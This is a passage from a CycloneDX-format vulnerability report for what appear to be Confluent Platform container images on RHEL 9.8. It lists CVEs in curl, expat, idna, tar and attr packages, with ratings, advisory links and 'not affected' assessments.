          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-build-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-plugin-systemd-inhibit@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm-sign-libs@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/rpm@4.16.1.3-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-45409",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1333
      ],
      "description": "Internationalized Domain Names in Applications (IDNA) for Python provides support for Internationalized Domain Names in Applications (IDNA) and Unicode IDNA Compatibility Processing. In versions prior to 3.15, payloads such as `\"\\u0660\" * N` or `\"\\u30fb\" * N + \"\\u6f22\"` utilize the `valid_contexto` function prior to length rejection, and for high values of `N` will take a long time to process. This is the same issue as CVE-2024-3651, however the original remediation in 2024 was not a complete fix. A specially crafted argument to the `idna.encode()` function could consume significant resources. This may lead to a denial-of-service. Starting in version 3.14, the function rejects long inputs as soon as practicable prior to any further processing to minimize resource consumption. In version 3.15, this approach was extended to lesser used alternate functions (i.e. per-label conversions and codec support). A workaround is available. Domain names cannot exceed 253 characters in length. If this length limit is enforced prior to passing the domain to the `idna.encode()` function, it should no longer consume significant resources. This is triggered by arbitrarily large inputs that would not occur in normal usage, but may be passed to the library assuming there is no preliminary input validation by the higher-level application.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-45409"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54290"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54484"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-45409"
        },
        {
          "url": "https://bugzilla.redhat.com/2485616"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2485616"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-45409"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-54484.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54290"
        },
        {
          "url": "https://github.com/kjd/idna"
        },
        {
          "url": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/idna/PYSEC-2026-215.yaml"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-45409.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-54484.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45409"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8549-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-45409"
        }
      ],
      "published": "2026-06-05T23:16:43+00:00",
      "updated": "2026-07-23T07:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ]
    },
    {
      "id": "CVE-2026-4873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295,
        319
      ],
      "description": "A vulnerability exists where a connection requiring TLS incorrectly reuses an\nexisting unencrypted connection from the same connection pool. If an initial\ntransfer is made in clear-text (via IMAP, SMTP, or POP3), a subsequent request\nto that same host bypasses the TLS requirement and instead transmit data\nunencrypted.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4873"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4873"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-4873.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5fgw-rv54-prjx"
        },
        {
          "url": "https://hackerone.com/reports/3621851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4873"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4873"
        }
      ],
      "published": "2026-05-13T13:01:55+00:00",
      "updated": "2026-06-17T10:57:22+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-50219",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "libexpat before 2.8.2 lacks handler call depth tracking for calls to XML_GetBuffer, XML_Parse, XML_ParseBuffer, XML_ParserFree, or XML_ParserReset from within handlers in cases of a policy violation. Thus, a use-after-free can occur,",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-50219"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-50219"
        },
        {
          "url": "https://github.com/libexpat/libexpat/pull/1246"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50219"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-50219"
        }
      ],
      "published": "2026-06-04T06:16:25+00:00",
      "updated": "2026-07-22T20:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-53655",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N"
        }
      ],
      "cwes": [
        436
      ],
      "description": "node-tar is a full-featured Tar for Node.js. Prior to 7.5.16, tar (node-tar) applies a PAX extended header's size= record (and other PAX overrides) to the next header entry of any type, including intermediary metadata headers such as a GNU long-name (L) or long-link (K) entry. Per POSIX pax, a PAX extended header (x) describes the next file entry, not the intermediary extension headers that may sit between the x header and the file it annotates. Because node-tar lets the PAX size override the byte length of an intervening L/K/x header, an attacker can desynchronize node-tar's stream cursor relative to every other mainstream tar implementation (GNU tar, libarchive/bsdtar, Python tarfile, and the now-fixed tar-rs / astral-tokio-tar). The result is a tar parser interpretation differential (CWE-436): a single crafted archive yields a different set of members under node-tar than under the reference tar tools. An attacker can use this to hide a member from one parser while it is visible to another, which defeats security tooling whose scanner and extractor disagree on archive contents (e.g. a malware/secret scanner that lists entries with one library while a downstream step extracts with another) This vulnerability is fixed in 7.5.16.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-53655"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-53655"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-vmf3-w455-68vh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53655"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-53655"
        }
      ],
      "published": "2026-06-22T16:16:38+00:00",
      "updated": "2026-06-26T20:03:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-54371",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        59
      ],
      "description": "attr before version 2.6.0 contains a symlink traversal vulnerability in the getfattr and setfattr utilities that allows local attackers to escalate privileges by replacing a pathname component with a symbolic link during directory hierarchy traversal. Attackers who control a pathname component can redirect getfattr and setfattr operations to arbitrary files by substituting a symlink, leading to local privilege escalation when getfattr or setfattr is invoked by a privileged process over an attacker-controlled path.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54371"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34889"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56133"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54371"
        },
        {
          "url": "https://bugzilla.redhat.com/2490283"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490283"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=49f79e947270f06940b9100fa638f85dddc4aa7f"
        },
        {
          "url": "https://cgit.git.savannah.nongnu.org/cgit/attr.git/commit/?id=c440855d6b33446edf4b5eb1a2d892281f15a99b"
        },
        {
          "url": "https://errata.almalinux.org/8/ALSA-2026-56133.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-54371.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-56133.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54371"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-54371.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54371"
        },
        {
          "url": "https://www.vulncheck.com/advisories/attr-symlink-traversal-privilege-escalation-via-getfattr-setfattr"
        }
      ],
      "published": "2026-06-29T14:16:57+00:00",
      "updated": "2026-08-19T12:18:32+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/attr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.1-3.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libattr@2.5.1-3.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.1-3.el9",
              "status": "affected"
            }
          ]
        },
        {
